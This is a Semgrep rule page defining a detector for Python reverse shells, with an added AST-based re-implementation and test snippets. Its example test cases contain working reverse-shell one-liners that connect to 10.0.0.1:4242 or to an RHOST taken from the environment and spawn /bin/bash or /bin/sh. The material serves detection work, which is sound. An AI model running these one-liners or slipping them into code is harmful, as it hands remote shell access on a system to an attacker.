python.lang.security.audit.python-reverse-shell.python-reverse-shell

Author: unknown
Semgrep found a Python reverse shell using $BINPATH to $IP at $PORT
Definition
rules:
  - id: python-reverse-shell
    patterns:
      - pattern-either:
          - pattern: pty.spawn("$BINPATH",...)
          - pattern: subprocess.call(["$BINPATH",...],...)
      - metavariable-regex:
          metavariable: $BINPATH
          regex: /bin/.*?sh\b
      - pattern-inside: |
          import socket
          ...
          $S = socket.socket(...)
          ...
          $S.connect(($IP,$PORT),...)
          ...
    message: Semgrep found a Python reverse shell using $BINPATH to $IP at $PORT
    metadata:
      cwe:
        - "CWE-553: Command Shell in Externally Accessible Directory"
      category: security
      technology:
        - python
      references:
        - https://cwe.mitre.org/data/definitions/553.html
      subcategory:
        - audit
      likelihood: LOW
      impact: MEDIUM
      confidence: LOW
      license: Commons Clause License Condition v1.0[LGPL-2.1-only]
    languages:
      - python
    severity: WARNING
Examples
python-reverse-shell.py
# ruleid: python-reverse-shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
# ruleid: python-reverse-shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
# ruleid: python-reverse-shell
import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")
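To show what the definition above matches and where it stops (the `pattern-inside` requires a socket connect in scope, and the `$BINPATH` regex rejects non-shell binaries), here is an added example, not part of the Semgrep rule or this registry page, that re-implements the rule's logic with Python's `ast` module and runs it over constructed snippets; it approximates `pattern-inside` by source order rather than Semgrep's control-flow-aware matching.

```python
import ast
import re

# The rule's metavariable-regex for $BINPATH (matches /bin/sh, /bin/bash, ...).
BINPATH_RE = re.compile(r"/bin/.*?sh\b")

def _dotted(call):
    """'pty.spawn' for pty.spawn(...), 's.connect' for s.connect(...), else None."""
    f = call.func
    if isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name):
        return f"{f.value.id}.{f.attr}"
    return None

def _str(node):
    return node.value if isinstance(node, ast.Constant) and isinstance(node.value, str) else None

def find_reverse_shells(source):
    """Return [(line, binpath)] for every /bin/*sh spawned after a socket connect.
    Mirrors the rule: `import socket`, `$S = socket.socket(...)`, `$S.connect(...)`,
    then pty.spawn("$BINPATH") or subprocess.call(["$BINPATH", ...]). Approximation:
    'then' means source order here, not Semgrep's control-flow-aware pattern-inside."""
    tree = ast.parse(source)
    if not any(isinstance(n, ast.Import) and any(a.name == "socket" for a in n.names)
               for n in ast.walk(tree)):
        return []
    socks = {t.id for n in ast.walk(tree) if isinstance(n, ast.Assign)  # $S = socket.socket(...)
             and isinstance(n.value, ast.Call) and _dotted(n.value) == "socket.socket"
             for t in n.targets if isinstance(t, ast.Name)}
    calls = sorted((n for n in ast.walk(tree) if isinstance(n, ast.Call)),
                   key=lambda n: (n.lineno, n.col_offset))
    connected, findings = False, []
    for call in calls:
        name, path = _dotted(call), None
        if name in {f"{s}.connect" for s in socks}:
            connected = True
        elif connected and call.args and name == "pty.spawn":
            path = _str(call.args[0])
        elif connected and call.args and name == "subprocess.call" \
                and isinstance(call.args[0], ast.List) and call.args[0].elts:
            path = _str(call.args[0].elts[0])
        if path and BINPATH_RE.search(path):
            findings.append((call.lineno, path))
    return findings

# Constructed inputs (not from the page): a hit, a shell with no socket, and a
# socket client that spawns a non-shell binary (regex does not match /bin/ls).
FLAGGED = "import socket, pty\ns = socket.socket()\ns.connect(('10.0.0.1', 4242))\npty.spawn('/bin/bash')\n"
NO_SOCKET = "import pty\npty.spawn('/bin/sh')\n"
NOT_A_SHELL = ("import socket, subprocess\ns = socket.socket()\n"
               "s.connect(('10.0.0.1', 80))\nsubprocess.call(['/bin/ls', '-l'])\n")
```

Running `find_reverse_shells` on the three inputs returns a single finding for `FLAGGED` (line 4, `/bin/bash`) and nothing for the other two, which is exactly the split the Semgrep rule is designed to make.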
Short Link: https://sg.run/gYZJ